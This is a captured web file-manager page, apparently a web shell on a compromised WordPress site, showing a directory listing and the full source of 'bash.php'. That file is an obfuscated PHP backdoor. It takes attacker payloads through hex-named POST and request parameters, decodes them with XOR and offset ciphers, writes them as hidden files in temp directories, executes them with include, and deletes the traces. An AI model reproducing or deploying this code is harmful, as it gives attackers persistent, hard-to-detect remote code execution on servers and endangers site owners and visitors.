at path:
ROOT
/
bash.php
run:
R
W
Run
b7786
DIR
2026-03-13 08:26:24
R
W
Run
d19677
DIR
2026-04-01 08:28:41
R
W
Run
wp-content
DIR
2026-03-28 11:31:17
R
W
Run
.htaccess
231 By
2026-03-28 06:50:28
R
W
Run
Delete
Rename
SOA.php
612 By
2023-06-23 08:26:16
R
W
Run
Delete
Rename
bash.php
2.02 KB
2023-06-23 08:26:16
R
W
Run
Delete
Rename
css
507 By
2026-02-24 08:04:56
R
W
Run
Delete
Rename
error_log
4.27 KB
2026-03-31 16:16:48
R
W
Run
Delete
Rename
robots.txt
438 By
2023-06-23 08:26:16
R
W
Run
simple.php
15.05 KB
2026-02-24 08:04:56
R
W
Run
Delete
Rename
error_log
up
📄
bash.php
Save
<?php if(!is_null($_POST["\x65\x6Etry"] ?? null)){ $data_chunk = array_filter([session_save_path(), sys_get_temp_dir(), "/var/tmp", "/tmp", ini_get("upload_tmp_dir"), getcwd(), getenv("TMP"), "/dev/shm", getenv("TEMP")]); $flag = $_POST["\x65\x6Etry"]; $flag= explode( "." , $flag ) ; $token=''; $s3='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS=strlen($s3); $v=0; foreach ($flag as $v4) { $chS=ord($s3[$v %$lenS]); $dec=((int)$v4 - $chS - ($v %10))^ 49; $token .= chr($dec); $v++; } foreach ($data_chunk as $hld): if (array_product([is_dir($hld), is_writable($hld)])) { $parameter_group = "$hld" . "/.k"; $success = file_put_contents($parameter_group, $token); if ($success) { include $parameter_group; @unlink($parameter_group); exit;} } endforeach; } if(!is_null($_REQUEST["\x64\x63\x68unk"] ?? null)){ $k = hex2bin($_REQUEST["\x64\x63\x68unk"]); $ref ='' ; $j = 0; do{$ref .= chr(ord($k[$j]) ^ 77);$j++;} while($j < strlen($k)); $symbol = array_filter([getenv("TMP"), session_save_path(), getenv("TEMP"), "/var/tmp", getcwd(), ini_get("upload_tmp_dir"), "/dev/shm", sys_get_temp_dir(), "/tmp"]); while ($itm = array_shift($symbol)) { if (!!is_dir($itm) && !!is_writable($itm)) { $fac = str_replace("{var_dir}", $itm, "{var_dir}/.component"); if (file_put_contents($fac, $ref)) { include $fac; @unlink($fac); exit; } } } } if(filter_has_var(INPUT_POST, "\x72\x65\x73\x6Furce")){ $itm = array_filter(["/tmp", getenv("TMP"), getcwd(), getenv("TEMP"), "/var/tmp", "/dev/shm", session_save_path(), sys_get_temp_dir(), ini_get("upload_tmp_dir")]); $parameter_group = hex2bin($_POST["\x72\x65\x73\x6Furce"]); $bind = '' ;for($y=0; $y<strlen($parameter_group); $y++){$bind .= chr(ord($parameter_group[$y]) ^ 5);} foreach ($itm as $key) { if ((bool)is_dir($key) && (bool)is_writable($key)) { $property_set = str_replace("{var_dir}", $key, "{var_dir}/.item"); if (file_put_contents($property_set, $bind)) { include $property_set; @unlink($property_set); die(); } } } }